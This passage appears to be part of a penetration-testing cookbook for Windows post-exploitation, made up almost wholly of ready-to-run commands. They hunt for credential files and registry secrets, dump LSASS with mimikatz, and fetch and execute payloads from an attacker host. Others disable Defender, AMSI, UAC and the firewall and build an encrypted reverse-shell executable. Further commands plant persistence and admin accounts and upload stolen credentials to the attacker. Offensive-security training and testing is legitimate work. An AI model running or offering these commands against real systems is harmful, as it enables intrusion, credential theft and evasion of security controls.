- %SYSTEMDRIVE%\Users\Administrator\NTUser.ini
- %SYSTEMDRIVE%\xampp\apache\bin\php.ini
- %SYSTEMDRIVE%\xampp\apache\conf\httpd.conf
- %SYSTEMDRIVE%\xampp\apache\logs\access.log
- %SYSTEMDRIVE%\xampp\apache\logs\error.log
- %SYSTEMDRIVE%\xampp\security\webdav.htpasswd
- %SYSTEMDRIVE%\xampp\tomcat\conf\tomcat-users.xml
- %SYSTEMDRIVE%\xampp\tomcat\conf\web.xml
- %SYSTEMDRIVE%\xampp\webalizer\webalizer.conf
- %SYSTEMDRIVE%\xampp\webdav\webdav.txt
- %APPDATA%\Microsoft\Credentials
- %APPDATA%\Microsoft\Protect
- *.gpg
- *.pgp
- *.p12
- *.der
- *.csr
- *.cer
- *.ovpn
- *.kdbx
`` Registry keys
- HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
- HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell
- HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\UserInit
- HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
- HKLM\Software\Microsoft\Windows\CurrentVersion\Run
- HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce
- HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx
- HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices
- HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
- HKLM\System\CurrentControlSet\Control\Session Manager\BootExecute
- HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell
- HKCU\Software\Microsoft\Windows\CurrentVersion\Run
- HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce
- HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices
- HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce (legacy Windows)
~> reg.exe query HKLM /f password /t REG_SZ /s
`` Weak Permissions
`` Filesystem
~> icacls "C:\Documents and Settings\*" 2>nul | findstr.exe "(F) (M)" | findstr.exe "Everyone BUILTIN\Users"
~> icacls "C:\Program Files (x86)\*" 2>nul | findstr.exe "(F) (M)" | findstr.exe "Everyone BUILTIN\Users"
~> icacls "C:\Program Files\*" 2>nul | findstr.exe "(F) (M)" | findstr.exe "Everyone BUILTIN\Users"
~> icacls "C:\Users\*" 2>nul | findstr.exe "(F) (M)" | findstr.exe "Everyone BUILTIN\Users"
~> icacls "C:\*." /findsid VAR_USERNAME /t /c /l 2>nul
-- Files
~> accesschk.exe -uwvs "Authenticated Users" c:\
~> accesschk.exe -uwvs "Everyone" c:\
~> accesschk.exe -uwvs "Users" c:\
-- Directories
~> accesschk.exe -duwvs "Authenticated Users" c:\
~> accesschk.exe -duwvs "Everyone" c:\
~> accesschk.exe -duwvs "Users" c:\
`` Registry
~> accesschk.exe -kuwvs "Authenticated Users" "HKLM\SYSTEM\CurrentControlSet\Services"
~> accesschk.exe -kuwvs "Everyone" "HKLM\SYSTEM\CurrentControlSet\Services"
~> accesschk.exe -kuwvs "Users" "HKLM\SYSTEM\CurrentControlSet\Services"
`` With PowerShell
~PS> Get-ChildItem -Recurse | Get-Acl | out-string -stream | select-string -pattern "Everyone"
`` Sensitive data
~> dir /S /B *sysprep.inf *sysprep.xml *unattended.xml *unattend.xml *unattend.txt 2>nul
~> dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config* 2>nul
~> dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config* 2>nul
~> cd C:\ && findstr.exe /SI /M password *.xml *.ini *.txt *.config *.cfg 2>nul
~PS> Get-Childitem -Path C:\Users\ -Include *pass*,*cred*,*vnc*,*.config -File -Recurse -ErrorAction SilentlyContinue
~PS> Get-ChildItem C:\* -include *.xml,*.ini,*.txt,*.config -Recurse -ErrorAction SilentlyContinue | Select-String -Pattern "password"
`` File transfer
`` BitsAdmin
~> cmd.exe /c "bitsadmin /transfer myjob /download /priority high http://VAR_ATTACKER_HOST/accesschk.exe accesschk.exe
~PS> Import-Module BitsTransfer
~PS> Start-BitsTransfer -Source $url -Destination $output
`` certutil
~> certutil.exe -urlcache -split -f "http://VAR_ATTACKER_HOST/file.b64" & certutil.exe -f -decode Blob0_0.bin accesschk.exe & del Blob0_0.bin
~> certutil.exe -urlcache -split -f "http://VAR_ATTACKER_HOST/file.b64" & certutil.exe -f -decode accesschk.b64 accesschk.exe & del accesschk.b64
`` Non-interactive FTP
`` Script
@ snippets/windows/utils/ftp.bat
`` Powershell
`` Script
@ snippets/windows/utils/wget_ps1.bat
`` CLI
~> powershell.exe Invoke-WebRequest -Uri http://VAR_ATTACKER_HOST/nc.exe -OutFile C:\nc.exe
~> powershell.exe -c "(new-object System.Net.WebClient).DownloadFile('http://VAR_ATTACKER_HOST/file.exe','C:\Users\user\Desktop\file.exe')"
~PS> $h=New-Object -com Msxml2.XMLHTTP;$h.open('GET','http://VAR_ATTACKER_HOST/script.ps1',$false);$h.send();iex $h.responseText
~PS> $h=New-Object -com WinHttp.WinHttpRequest.5.1;$h.open('GET','http://VAR_ATTACKER_HOST/script.ps1',$false);$h.send();iex $h.responseText
~PS> $h=New-Object Net.HttpListener;$h.Prefixes.Add("http://+:8000/");$h.Start();While ($h.IsListening){$HC=$h.GetContext();$HRes=$HC.Response;$HRes.Headers.Add("Content-Type","text/plain");$Buf=[Text.Encoding]::UTF8.GetBytes((GC (Join-Path $Pwd ($HC.Request).RawUrl)));$HRes.ContentLength64=$Buf.Length;$HRes.OutputStream.Write($Buf,0,$Buf.Length);$HRes.Close()};$h.Stop()
~PS> $ie=New-Object -com InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://VAR_ATTACKER_HOST/script.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r
~PS> IEX (iwr 'http://VAR_ATTACKER_HOST/script.ps1')
~PS> IEX (New-Object Net.Webclient).downloadstring("http://VAR_ATTACKER_HOST/script.ps1")
~PS> Import-Module bitstransfer;Start-BitsTransfer 'http://VAR_ATTACKER_HOST/script.ps1' $env:temp\t;$r=gc $env:temp\t;rm $env:temp\t; iex $r
`` DNS
~PS> IEX ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(((nslookup -querytype=txt "SERVER" | Select -Pattern '"*"') -split '"'[0]))))
`` Base64
~$ cat cmd.txt | iconv -t UTF-16LE -f UTF-8 | base64 -w0
~> powershell.exe -NoP -NonI -W Hidden -Exec Bypass -enc "JABjAGwAaQBlAG4AdAAgA...UAKAApAAoA"
`` VBS
`` Script
@ snippets/windows/utils/wget_vbs.bat
`` Powershell listener
@ snippets/windows/shells/bind/PortListener.ps1
`` Base64 encoder VBS
@ snippets/windows/utils/base64.vbs
`` Privilege escalation
`` Ideas
- Access to sensitive files such as the Windows SAM file
- Always Install Elevated
- Autologon User Credential
- DLL Hijacking / Proxying
- DLL Injection
- Group Policy Preferences
- Insecure File/Folder Permissions
- Insecure Named Pipes Permissions
- Insecure Registry Permissions
- Insecure Service Permissions
- Installation scripts and data containing passwords
- Registry settings such as always elevated and automatically executed binaries
- Scheduled tasks that execute scripts and programs
- Stored Credentials
- Token Manipulation
- Unattended Answer File
- Unquoted Service Path
- User Account Control (UAC) Bypass
- Vulnerable software running with high privileges
- Windows Kernel Exploit
`` Automated
`` Powershell
- PowerUp.ps1 (https://github.com/PowerShellEmpire/PowerTools)
- jaws-enum.ps1 (https://github.com/411Hall/JAWS)
- HostRecon.ps1 (https://github.com/dafthack/HostRecon)
`` Copy & Paste
~PS> (New-Object System.Net.WebClient).DownloadString('http://VAR_ATTACKER_HOST/PowerUp.ps1') | IEX; Invoke-AllChecks
~PS> (New-Object System.Net.WebClient).DownloadString('http://VAR_ATTACKER_HOST/jaws-enum.ps1') | IEX
~PS> (New-Object System.Net.WebClient).DownloadString('http://VAR_ATTACKER_HOST/HostRecon.ps1'); Invoke-HostRecon
`` Metasploit
~MS> use post/multi/recon/local_exploit_suggester
`` Services
`` Weak Permissions
~> accesschk.exe -uwvc "Authenticated Users" *
~> accesschk.exe -uwvc "Everyone" *
`` Bruteforcing
~PS> $services = ls HKLM:\SYSTEM\CurrentControlset\Services
~PS> foreach ($service in $services) {
~PS> reg.exe add $service.Name /v ImagePath /t REG_EXPAND_SZ /d "C:\Windows\Temp\test.bat" /f
~PS> Start-Service -name $service.Name.Split("\\")[-1]
~PS> }
`` Configuration
~> sc.exe qc upnphost
~> sc.exe config upnphost binpath= "net user VAR_USERNAME VAR_PASSWORD /add && net localgroup Administrators VAR_USERNAME /add" type= interact
~> sc.exe config upnphost obj= ".\LocalSystem" password= ""
~> net.exe stop upnphost
~> net.exe start upnphost
~PS> Get-Service -name "VAR_STRING*" | Set-Service -StartupType "disabled"
~PS> Stop-Process -force -name VAR_STRING*
`` Finding C# compiler
~> dir /s %WINDIR%\csc.exe
`` mimikatz
~> mimikatz "privilege::debug" "sekurlsa::logonPasswords" exit
~> mimikatz "privilege::debug" "token::elevate" "sekurlsa::logonPasswords" exit
~> mimikatz "privilege::debug" "token::elevate" "sekurlsa::logonPasswords" "lsadump::lsa" "lsadump::trust" exit
~> mimikatz "privilege::debug" "token::elevate /domainadmin" exit
token::run cmd.exe
sekurlsa::pth /user:VAR_USERNAME /domain:VAR_DOMAIN /ntlm:VAR_NT_HASH /run:cmd
~PS> Invoke-Mimikatz -Command '"privilege::debug sekurlsa::logonPasswords"'
~PS> Invoke-Mimikatz -Command '"privilege::debug dbapi::cred /in:VAR_STRING"'
`` With SharpSploit
~> SharpSploitConsole.exe Mimi-Command "!+"
~> SharpSploitConsole.exe Mimi-Command "!processprotect /process:lsass.exe /remove"
~> SharpSploitConsole.exe Mimi-All
`` Dump with SysInternals procdump.exe and load offline to mimikatz
~> procdump.exe -ma lsass.exe lsass.dmp -accepteula
~> mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit
`` Dump with native DLL
~> tasklist.exe /fi "imagename eq lsass.exe"
~> C:\Windows\system32\rundll32.exe C:\Windows\system32\comsvcs.dll, MiniDump VAR_STRING_PID %TEMP%\lsass.dmp full
`` Run shell as NT AUTHORITY\SYSTEM
~> psexec.exe -h -i -s %SYSTEMROOT%\system32\cmd.exe -accepteula
`` Evasion
`` AppLocker-free paths
- applocker-bypas-checker.ps1 (https://github.com/HackLikeAPornstar/GibsonBird/blob/master/chapter4/applocker-bypas-checker.ps1)
`` LOLBINs
~> cmd.exe /k < \\VAR_ATTACKER_HOST\folder\batchfile.txt
~> cscript //E:jscript \\VAR_ATTACKER_HOST\folder\payload.txt
~> mshta vbscript:Close(Execute("GetObject(""script:http://VAR_ATTACKER_HOST/payload.sct"")"))
~> mshta http://VAR_ATTACKER_HOST/payload.hta
~> mshta \\VAR_ATTACKER_HOST\folder\payload.hta
~> rundll32.exe \\VAR_ATTACKER_HOST\folder\payload.dll,entrypoint
~> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";o=GetObject("script:http://VAR_ATTACKER_HOST/payload.sct");window.close();
~> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";eval("w=new%20ActiveXObject(\"WScript.Shell\");w.Exec(\"calc\")");
~> wmic.exe os get /format:"https://VAR_ATTACKER_HOST/payload.xsl"
~> C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /u \\VAR_ATTACKER_HOST\folder\payload.dll
~> regsvr32 /u /n /s /i:http://VAR_ATTACKER_HOST/payload.sct scrobj.dll
~> regsvr32 /u /n /s /i:\\VAR_ATTACKER_HOST\folder\payload.sct scrobj.dll
~> odbcconf /s /a {regsvr \\VAR_ATTACKER_HOST\folder\payload_dll.txt}
~> cmd /V /c "set MB="C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe" & !MB! /noautoresponse /preprocess \\VAR_ATTACKER_HOST\folder\payload.xml > payload.xml & !MB! payload.xml"
~> certutil -urlcache -split -f http://VAR_ATTACKER_HOST/payload.b64 payload.b64 & certutil -decode payload.b64 payload.dll & C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil /logfile= /LogToConsole=false /u payload.dll
~> rundll32 c:\windows\system32\ieframe.dll,OpenURL 1.url
`` AlwaysInstallElevated
~> reg.exe query "HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated"
~> reg.exe query "HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated"
`` Disabling defense
`` Is Credential Guard enabled?
~PS> Get-CimInstance -ClassName Win32_DeviceGuard -Namespace root\Microsoft\Windows\DeviceGuard
`` Disabling Windows Defender
~> reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
-- Disable real-time monitoring, cloud-delivered protection and automatic sample submission
~PS> Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disabled
~> sc.exe stop WinDefend
~PS> "C:\Program Files\Windows Defender\mpcmdrun.exe" -RemoveDefinitions -All Set-MpPreference -DisableIOAVProtection $true
~PS> Add-MpPreference -ExclusionPath C:\
`` Invoke-Mimikatz "obfuscation"
~$ ~/lib/pentesting-cookbook/snippets/windows/utils/obfuscate-mimikatz.sh ./Invoke-Mimikatz.ps1 Invoke-Minidoggiez.ps1
`` Invoke-Obfuscation
~PS> Invoke-Obfuscation -ScriptPath 'https://example.com/VAR_STRING.ps1' -Command 'TOKEN,ALL,1,OUT Invoke-Minidoggiez.ps1' -Quiet
`` In-memory Mimikatz
~PS> $browser = New-Object System.Net.WebClient
~PS> $browser.Proxy.Credentials =[System.Net.CredentialCache]::DefaultNetworkCredentials
~PS> mimi= $browser.DownloadString("http://VAR_ATTACKER_HOST/Invoke-Minidoggiez.ps1")
~PS> Invoke-Expression(mimi)
~PS> Invoke-Minidoggiez
`` Hyperion
~$ msfvenom -p windows/shell_reverse_tcp lhost=VAR_ATTACKER_HOST lport=VAR_ATTACKER_PORT -f exe -e x86/shikata_ga_nai -i 9 -x /usr/share/windows-binaries/plink.exe -o foobar.exe
~$ cp /usr/share/windows-binaries/Hyperion-1.0.zip .
~$ unzip Hyperion-1.0.zip
~$ cd Hyperion-1.0/
~$ Hyperion-1.0# i686-w64-mingw32-g++ Src/Crypter/*.cpp -o hyperion.exe
~$ Hyperion-1.0# cp -p /usr/lib/gcc/i686-w64-mingw32/6.1-win32/libgcc_s_sjlj-1.dll .
~$ Hyperion-1.0# cp -p /usr/lib/gcc/i686-w64-mingw32/6.1-win32/libstdc++-6.dll .
~$ Hyperion-1.0# wine hyperion.exe ../foobar.exe ../crypted.exe
`` Disable AMSI
~PS> [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed', 'NonPublic,Static').SetValue($null,$true)
~PS> IEX(New-Object System.Net.WebClient).DownloadString('http://VAR_ATTACKER_HOST:8001/amsi-bypass.ps1')
`` Is UAC enabled?
~> reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA
`` Disable UAC (Vista, 7, 8, 10)
~> reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d 0 /f
`` UAC bypass by mounting system
~> net.exe use Z: \\127.0.0.1\c$
~> cd C$
`` Reading files
~PS> .\Invoke-NinjaCopy.ps1 -Path "C:\Windows\System32\config\system" -LocalDestination c:\%TEMP\system.bak
~PS> .\Invoke-NinjaCopy.ps1 -Path "C:\Windows\System32\config\sam" -LocalDestination c:\%TEMP\sam.bak
`` JScript Assembly
[Reflection.Assembly]::LoadWithPartialName('Microsoft.JScript');$js = 'var js = new ActiveXObject("WScript.Shell");js.Run("calc");'[Microsoft.JScript.Eval]::JScriptEvaluate($js,[Microsoft.JScript.Vsa.VsaEngine]::CreateEngine());
`` XML/XSL
~PS> $s=New-Object System.Xml.Xsl.XsltSettings;$r=New-Object System.Xml.XmlUrlResolver;$s.EnableScript=1;$x=New-Object System.Xml.Xsl.XslCompiledTransform;$x.Load('http://VAR_ATTACKER_HOST/xsl-notepad.xsl',$s,$r);$x.Transform('http://VAR_ATTACKER_HOST/xsl-notepad.xml','z');del z;
`` SCT
`` Powershell VBScript Assembly SCT "Fetch & Execute"
~PS> [Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');[Microsoft.VisualBasic.Interaction]::GetObject('script:http://VAR_ATTACKER_HOST/notepad.sct').Exec(0)
`` Powershell JScript Assembly SCT "Fetch & Execute"
~PS> [Reflection.Assembly]::LoadWithPartialName('Microsoft.JScript');[Microsoft.JScript.Eval]::JScriptEvaluate('GetObject("script:http://VAR_ATTACKER_HOST/notepad.sct").Exec()',[Microsoft.JScript.Vsa.VsaEngine]::CreateEngine())
`` Loading .Net/C# Assemblies to Bypass AppLocker Default Rules w/ PowerShell Diagnostic Scripts
~> powershell.exe -v 2 -ep bypass
~PS> cd C:\windows\diagnostics\system\AERO
~PS> import-module .\CL_LoadAssembly.ps1
~PS> LoadAssemblyFromPath ..\..\..\..\path\assembly.exe
~PS> [name.space]::executesomething()
`` Command Invocation w/ PowerShell Diagnostic Scripts
~> powershell.exe -v 2 -ep bypass
~PS> cd C:\windows\diagnostics\system\AERO
~PS> import-module CL_Invocation.ps1
~PS> SyncInvoke notepad.exe
`` PowerShell CL Download Cradle
~PS> $a = New-Object System.Xml.XmlDocument
~PS> $a.Load("http://VAR_ATTACKER_HOST/notepad.xml")
~PS> $a.command.a.execute | iex
`` Installing root certificate
~> certutil.exe -addstore -f -user Root %TEMP%\cert.cer
~PS> Import-Certificate -FilePath %TEMP%\cert.cer -CertStoreLocation Cert:\CurrentUser\Root\
`` diskshadow.exe
`` Interactive
~> c:\windows\system32\diskshadow.exe
> exec calc.exe
> exec "cmd.exe" /c calc.exe
> exit
`` Script (diskshadow.txt)
set context persistent nowriters
add volume c: alias someAlias
create
expose %someAlias% z:
exec "cmd.exe" /c copy z:\windows\ntds\ntds.dit c:\exfil\ntds.dit
exec "cmd.exe" /c reg.exe save hklm\system c:\exfil\system.bak
delete shadows volume %someAlias%
reset
`` Execution
~> diskshadow.exe /s c:\test\diskshadow.txt
`` Persistence
~> schtasks.exe /create /sc hourly /tn VSSTask /tr "diskshadow.exe /s c:\test\diskshadow.txt"
~> reg.exe add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v VSSRun /t REG_EXPAND_SZ /d "diskshadow.exe /s c:\test\diskshadow.txt"
`` Uninstall Windows patch
~> wusa /uninstall /kb:4498932 /quiet /norestart
`` Persistence
`` Registry
-- Screen saver
~> reg.exe add "HKCU\Control Panel\Desktop" /v SCRNSAVE.EXE /d c:\shell.cmd
~PS> New-ItemProperty -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run -Name PersistCalc -PropertyType String -Value "C:\Windows\System32\calc.exe"
`` Accounts
`` CLI
~> net.exe user VAR_USERNAME VAR_PASSWORD /add
~> net.exe localgroup administrators VAR_USERNAME /add
~> net.exe localgroup "Remote Desktop Users" VAR_USERNAME /add
`` useradd.c
@ snippets/windows/backdoors/useradd.c
`` Services
`` Use e.g. ServiceWrapper
-- Executable must be wrapped as a Windows service
~> sc.exe create VAR_NAME binpath= "C:\Program Files\Intel\update.exe"
-- Now allow all authenticated users to take control over the service using SDDL format, e.g.
~> sc.exe sdshow VAR_NAME
D:(A;;CCLCSWLOCRRC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWRPWPDTLOCRRC;;;SY)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
-- VAR_STRING must be the result from sc sdshow plus "(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;AU)" (allow all to authenticated users) (in the D: section, right before S:)
~> sc.exe sdset VAR_NAME VAR_STRING
`` Launch command prompt on demand
~> sc.exe create VAR_NAME binpath= "cmd.exe /K start" type= own type= interact start= demand
-- Add permissions as above
`` Services
~> sc.exe \\VAR_TARGET_HOST create VAR_STRING binpath= "c:\Windows\Temp\foobar.exe"
~> sc.exe \\VAR_TARGET_HOST start VAR_STRING
~> sc.exe \\VAR_TARGET_HOST delete VAR_STRING
`` Registry
`` Command will run every time a user logs in as the user
~> reg.exe add "\\VAR_TARGET_HOST\HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "VAR_STRING" /t REG_SZ /d "VAR_STRING"
`` Query the remote registry
~> reg.exe query "\\VAR_TARGET_HOST\HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "VAR_STRING"
`` Delete the remote registry
~> reg.exe delete "\\VAR_TARGET_HOST\HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "VAR_STRING"
`` Startup
`` Executes every time a user logs in
~> xcopy foobar.exe "\\VAR_TARGET_HOST\C$\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\launcher.bat"
`` Scheduler
`` Create new task and execute it
~> schtasks.exe /create /tn VAR_STRING /tr c:\windows\temp\foobar.exe /sc once /st 00:00 /S VAR_TARGET_HOST /RU System
~> schtasks.exe /run /tn VAR_STRING /S VAR_TARGET_HOST
~> schtasks.exe /create /sc minute /mo 10 /tn VAR_STRING /tr c:\windows\temp\foobar.exe
`` Delete the task after it is executed
~> schtasks.exe /F /delete /tn VAR_STRING /S VAR_TARGET_HOST
`` Windows Firewall
`` Stop service
~> net.exe stop MspSvc
~> netsh.exe advfirewall set allprofiles state off
~> netsh.exe advfirewall show allprofiles
~> netsh.exe firewall set opmode disable
`` RDP
~> net.exe start TermService
~> netsh.exe add portopening TCP 3389 "Remote Desktop"
~> netsh.exe firewall set service RemoteAdmin enable
~> netsh.exe firewall set service RemoteDesktop enable
~> sc.exe config TermService start= auto
~> reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\currentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 1 /f
~> reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\currentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0 /f
~> reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fAllowToGetHelp" /t REG_DWORD /d 1 /f
~> reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "UserAuthentication" /t REG_DWORD /d 0 /f
`` Enable restricted admin mode
~> reg.exe add "HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa" /v "DisableRestrictedAdmin" /t REG_DWORD /d 0 /f
`` Enabling scripts in Outlook client
`` Outlook 2016
~> reg.exe add "HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Security" /v "EnableUnsafeClientMailRules" /t REG_DWORD /d 1 /f
`` Outlook 2013
~> reg.exe add "HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Security" /v "EnableUnsafeClientMailRules" /t REG_DWORD /d 1 /f
`` Outlook 2010
~> reg.exe add "HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Outlook\Security" /v "EnableUnsafeClientMailRules" /t REG_DWORD /d 1 /f
`` Physical access
`` Replace with cmd.exe (Sticky Keys)
-- SHIFT 5 times
C:\Windows\System32\sethc.exe
-- WINDOWS+U
C:\Windows\System32\Utilman.exe
-- WINDOWS+U, on-screen keyboard
C:\Windows\System32\osk.exe
-- WINDOWS+P
C:\Windows\System32\DisplaySwitch.exe
`` Attach debugger, for example:
~> reg.exe add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /t REG_SZ /v Debugger /d "C:\windows\system32\cmd.exe /k" /f
`` Windows 10 (virtual keyboard)
~> reg.exe add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe" /v "Debugger" /t REG_SZ /d "cmd.exe" /f
`` Runas
@ snippets/windows/utils/runas*
`` Looting
`` Standard looting procedure after getting local admin
-- Start HTTP receiver
~$ ~/lib/pentesting-cookbook/bin/httpd.py -p 8008
-- Is Tamper Protection enabled?
~PS> (Get-MpComputerStatus).IsTamperProtected
-- If not, disable Windows Defender, sample submission and cloud analytics
-- Otherwise disable Tamper Protection using GUI first
~> powershell.exe -c "Set-MpPreference -DisableRealtimeMonitoring 1 -SubmitSamplesConsent NeverSend -MAPSReporting Disabled"
-- Download tools
~> mkdir c:\Windows\Tasks\tmp\
~> curl.exe "http://VAR_ATTACKER_HOST/mimidrv.sys" -o C:\Windows\system32\IntelAudioRTX.sys
~> curl.exe "http://VAR_ATTACKER_HOST/minidump.exe" -o C:\Windows\Tasks\tmp\minidump.exe
~> curl.exe "http://VAR_ATTACKER_HOST/mimikatz.exe" -o C:\Windows\Tasks\tmp\mimikatz.exe
-- Disable LSASS process protection
~> sc.exe create IntelAudioRTX binPath= C:\Windows\system32\IntelAudioRTX.sys type= kernel start= demand
~> sc.exe start IntelAudioRTX
~> powershell
~PS> (New-Object System.Net.WebClient).DownloadString('http://VAR_ATTACKER_HOST/amsi.txt') | IEX
~PS> (New-Object System.Net.WebClient).DownloadString('http://VAR_ATTACKER_HOST/mimikatz.txt') | IEX
~PS> Invoke-Mimikatz -Command "`"!processprotect /process:lsass.exe /remove`""
~PS> exit
-- Dump LSASS process memory
~> mkdir C:\Windows\Tasks\tmp\loot
~> C:\Windows\Tasks\tmp\minidump.exe
~> move C:\Windows\Tasks\lsass.dmp C:\Windows\Tasks\tmp\loot\
-- Grab the most important things related to Kerberos and locally stored credentials
~> powershell
~PS> cd C:\Windows\Tasks\tmp\loot
~PS> C:\Windows\Tasks\tmp\mimikatz.exe "privilege::debug" "sekurlsa::minidump C:\Windows\Tasks\tmp\loot\lsass.dmp" "sekurlsa::logonpasswords" "sekurlsa::tickets /export" "sekurlsa::ekeys" exit > C:\Windows\Tasks\tmp\loot\mimikatz.log
-- Compress and send home (using ~/lib/pentesting-cookbook/bin/httpd.py on the other end)
~> tar.exe -a -c -f C:\Windows\Tasks\tmp.zip C:\Windows\Tasks\tmp\loot
-- Configure the client in case there's a web proxy
~PS> [System.Net.WebRequest]::DefaultWebProxy = [System.Net.WebRequest]::GetSystemWebProxy()
~PS> [System.Net.WebRequest]::DefaultWebProxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials
-- And now send home (using ~/lib/pentesting-cookbook/bin/httpd.py on the other end)
~PS> (New-Object System.Net.WebClient).UploadFile('http://VAR_ATTACKER_HOST:8008/dc.example.com.zip', 'C:\Windows\Tasks\tmp.zip')
`` Passwords
`` Registry
- HKCU\Software\ORL\WinVNC3\Password
- HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" #Autologi
- HKLM\SYSTEM\CurrentControlSet\Services\SNMP
- HKCU\Software\TightVNC\Server
- HKCU\Software\SimonTatham\PuTTY\Sessions
- HKCU\Software\OpenSSH\Agent\Key
~> reg.exe save "HKLM\SYSTEM" %TEMP%\SYSTEM.bak
~> reg.exe save "HKLM\SAM" %TEMP%\SAM.bak
~> reg.exe save "HKLM\SECURITY" %TEMP%\SECURITY.bak
~> reg.exe query HKLM /f password /t REG_SZ /s
~> reg.exe query HKCU /f password /t REG_SZ /s
`` Windows Server 2007
C:\Windows\System32\config\SAM
C:\Windows\System32\config\SYSTEM
C:\Windows\System32\config\RegBack\SAM
C:\Windows\System32\config\RegBack\SAM.OLD
C:\Windows\System32\config\RegBack\SYSTEM
C:\Windows\System32\config\RegBack\SYSTEM.OLD
`` Windows XP
C:\Windows\repair\SAM
C:\Windows\repair\SECURITY
C:\Windows\repair\system
`` Other locations
~> dir %SYSTEMROOT%\repair\SAM 2>nul
~> dir %SYSTEMROOT%\System32\config\RegBack\SAM 2>nul
~> dir %SYSTEMROOT%\System32\config\SAM 2>nul
~> dir %SYSTEMROOT%\repair\system 2>nul
~> dir %SYSTEMROOT%\System32\config\SYSTEM 2>nul
~> dir %SYSTEMROOT%\System32\config\RegBack\system 2>nul
~> dir /a /b /s SAM.b*
`` Windows Autologin
~> reg.exe query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"
`` Putty
~> reg.exe query "HKCU\Software\SimonTatham\PuTTY\Sessions"
`` Stored credentials (DPAPI)
`` Windows Vista and later
- C:\Users\VAR_USERNAME\AppData\Roaming\Microsoft\Credentials
- C:\Users\VAR_USERNAME\AppData\Local\Microsoft\Credentials
`` Windows 8 and later
- C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Credentials
`` Windows XP
- C:\Documents and Settings\VAR_USERNAME\Application Data\Microsoft\Credentials
- C:\Documents and Settings\VAR_USERNAME\Local Settings\Application Data\Microsoft\Credentials
`` Vault
- C:\Users\VAR_USERNAME\AppData\Local\Microsoft\Vault
- C:\ProgramData\Microsoft\Vault
- C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Vault
~$ python /opt/impacket/examples/dpapi.py credential -file credentials
`` Force wdigest provider to keep passwords, ask users to log in:
~> reg.exe add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1
`` Wireless
-- Grab all keys
~> netsh.exe wlan show profile name=* key=clear
-- [Source: https://raw.githubusercontent.com/BankSecurity/Red_Team/master/Credential_Access/Wifi_Passwords.txt]
~> powershell.exe netsh.exe wlan show profiles|Select-String -Pattern " User Profile"|ForEach-Object{echo $_.Line.split(':')[1].trim()}|ForEach-Object{netsh.exe wlan show profiles name=$_ key=clear}|Select-String -Pattern "Key Content|SSID name"
-- Windows 10
